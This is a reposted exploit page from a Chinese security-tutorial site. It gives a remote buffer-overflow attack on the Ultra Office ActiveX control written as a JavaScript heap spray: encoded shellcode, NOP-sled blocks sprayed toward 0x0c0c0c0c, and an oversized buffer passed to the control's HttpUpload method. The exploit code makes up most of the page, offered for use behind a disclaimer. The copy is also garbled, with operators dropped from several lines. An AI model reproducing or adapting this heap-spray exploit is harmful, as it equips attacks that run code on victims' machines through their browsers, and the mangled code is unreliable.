• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Ultra Office ActiveX Control Remote Buffer Overflow Exploit ,其中包含exploit,exploit是什么意思,exploit db,exploit开拓官网,exploit开拓工具等知识点,遇到此问题的同学们可以参考下
-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Buffer Overflow
url: http://www.ultrashareware.com Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<script language="JavaScript" defer>
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A"
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350"
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40"
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000"
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040"
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD"
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40"
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18"
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0"
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B"
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24"
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9"
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C"
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 20000;
var x = unescape(" ");
while (x.length<buffSize) x = x;
x = x.substring(0,buffSize);
boom.HttpUpload(x, x, x);
}
function getsSlide(sSlide, sSlideSize)
{
while (sSlide.length*2<sSlideSize)
{
sSlide = sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize sizeHDM);
var heapBlocks = (heapSA heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i )
{
memory[i] = sSlide sCode;
}
</script>
<body onload="JavaScript: return tryMe();">
<object id="boom" classid="clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7">
Unable to create object
</object>
</div>

您可能想查找下面的文章:

  • Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
  • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
  • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
  • Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
  • Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
  • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
  • NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
  • WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

相关文章

  • Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
  • The Personal FTP Server 6.0f RETR Denial of Service Exploit
  • MS Windows (MessageBox) Memory Corruption Local Denial of Service
  • Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
  • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
  • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
  • Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
  • BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
  • eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
  • DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
    • Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
    • NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
    • Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit
    • LoveCMS 1.6.2 Final Remote Code Execution Exploit
    • pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
    • Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
    • Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
    • Acoustica Mixcraft
    • Comdev Web Blogger

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有